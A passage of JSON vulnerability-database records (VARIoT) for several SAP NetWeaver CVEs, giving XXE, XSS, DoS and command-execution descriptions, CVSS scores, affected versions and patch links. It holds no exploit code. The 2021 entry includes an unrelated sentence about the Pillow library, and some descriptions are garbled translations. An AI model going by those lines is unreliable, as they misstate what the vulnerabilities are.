}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.1,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2492",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2492",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201812-485",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"db": "NVD",
"id": "CVE-2018-2492"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAML 2.0 functionality in SAP NetWeaver AS Java, does not sufficiently validate XML documents received from an untrusted source. This is fixed in versions 7.2, 7.30, 7.31, 7.40 and 7.50. SAP NetWeaver AS Java Contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. SAP NetWeaver AS Java is prone to an XML External Entity injection vulnerability. \nAttackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2492"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"db": "BID",
"id": "106153"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2492",
"trust": 2.7
},
{
"db": "BID",
"id": "106153",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013092",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201812-485",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "106153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"db": "NVD",
"id": "CVE-2018-2492"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
]
},
"id": "VAR-201812-0571",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:28:41.317000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - December 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=508559699"
},
{
"title": "SAP NetWeaver AS Java Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=87733"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-611",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"db": "NVD",
"id": "CVE-2018-2492"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=508559699"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/106153"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2642680"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2492"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2492"
},
{
"trust": 0.3,
"url": "https://wiki.scn.sap.com/wiki/display/asjava/as+java+home"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "BID",
"id": "106153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"db": "NVD",
"id": "CVE-2018-2492"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "106153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"db": "NVD",
"id": "CVE-2018-2492"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-11T00:00:00",
"db": "BID",
"id": "106153"
},
{
"date": "2019-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"date": "2018-12-11T22:29:00.297000",
"db": "NVD",
"id": "CVE-2018-2492"
},
{
"date": "2018-12-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-11T00:00:00",
"db": "BID",
"id": "106153"
},
{
"date": "2019-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013092"
},
{
"date": "2021-04-20T19:21:10.330000",
"db": "NVD",
"id": "CVE-2018-2492"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS Java Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013092"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-485"
}
],
"trust": 0.6
}
}
var-201107-0311
Vulnerability from variot
A security vulnerability exists in SAP NetWeaver that is passed to the CIDXBTDDump.jsp in the Ispeak Details Monitoring application (com.sap.aii.af.ispeak.app). The input to the BTDDump.jsp and RNIF11BTDDump.jsp script \"txtBtdID\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has security vulnerabilities. Business Communication Broker does not properly restrict the use of certain functions. Attackers can exploit vulnerabilities to obtain sensitive information such as J2EE patch levels and internal IP addresses. When processing the tag of a SOAP-RFC request, the XML parser has an integer overflow error. The attacker can exploit the vulnerability to terminate the disp+work.exe service, causing a denial of service attack. An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, disclose sensitive information, or cause denial-of-service conditions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201107-0311",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.10*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.30*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.02*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.01*"
}
],
"sources": [
{
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"db": "CNVD",
"id": "CNVD-2011-2739"
},
{
"db": "BID",
"id": "48718"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov, Dmitriy Evdokimov, and Alexey Sintsov from DSecRG",
"sources": [
{
"db": "BID",
"id": "48718"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A security vulnerability exists in SAP NetWeaver that is passed to the CIDXBTDDump.jsp in the Ispeak Details Monitoring application (com.sap.aii.af.ispeak.app). The input to the BTDDump.jsp and RNIF11BTDDump.jsp script \\\"txtBtdID\\\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has security vulnerabilities. Business Communication Broker does not properly restrict the use of certain functions. Attackers can exploit vulnerabilities to obtain sensitive information such as J2EE patch levels and internal IP addresses. When processing the tag of a SOAP-RFC request, the XML parser has an integer overflow error. The attacker can exploit the vulnerability to terminate the disp+work.exe service, causing a denial of service attack. \nAn attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, disclose sensitive information, or cause denial-of-service conditions",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"db": "CNVD",
"id": "CNVD-2011-2739"
},
{
"db": "BID",
"id": "48718"
},
{
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "48718",
"trust": 2.1
},
{
"db": "CNVD",
"id": "CNVD-2011-2735",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-2737",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-2739",
"trust": 0.8
},
{
"db": "IVD",
"id": "2CA34F36-1F8F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "56F6D208-1F8F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "539F900E-1F8F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"db": "CNVD",
"id": "CNVD-2011-2739"
},
{
"db": "BID",
"id": "48718"
}
]
},
"id": "VAR-201107-0311",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"db": "CNVD",
"id": "CNVD-2011-2739"
}
],
"trust": 2.8925504733333334
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 2.4
}
],
"sources": [
{
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"db": "CNVD",
"id": "CNVD-2011-2739"
}
]
},
"last_update_date": "2022-05-17T02:06:03.945000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP Netweaver Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4438"
},
{
"title": "Patch for SAP Netweaver Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4437"
},
{
"title": "Patch for SAP Netweaver Denial of Service Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4440"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"db": "CNVD",
"id": "CNVD-2011-2739"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=328"
},
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=327"
},
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=329"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"db": "CNVD",
"id": "CNVD-2011-2739"
},
{
"db": "BID",
"id": "48718"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"db": "CNVD",
"id": "CNVD-2011-2739"
},
{
"db": "BID",
"id": "48718"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-20T00:00:00",
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-07-20T00:00:00",
"db": "IVD",
"id": "56f6d208-1f8f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-07-20T00:00:00",
"db": "IVD",
"id": "539f900e-1f8f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-07-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"date": "2011-07-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"date": "2011-07-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2739"
},
{
"date": "2011-07-19T00:00:00",
"db": "BID",
"id": "48718"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2737"
},
{
"date": "2011-07-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2735"
},
{
"date": "2011-07-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2739"
},
{
"date": "2011-07-19T00:00:00",
"db": "BID",
"id": "48718"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "48718"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Information Disclosure Vulnerability",
"sources": [
{
"db": "IVD",
"id": "2ca34f36-1f8f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2735"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "48718"
}
],
"trust": 0.3
}
}
var-202109-1053
Vulnerability from variot
SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable. SAP NetWeaver for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-1053",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"cve": "CVE-2021-38163",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
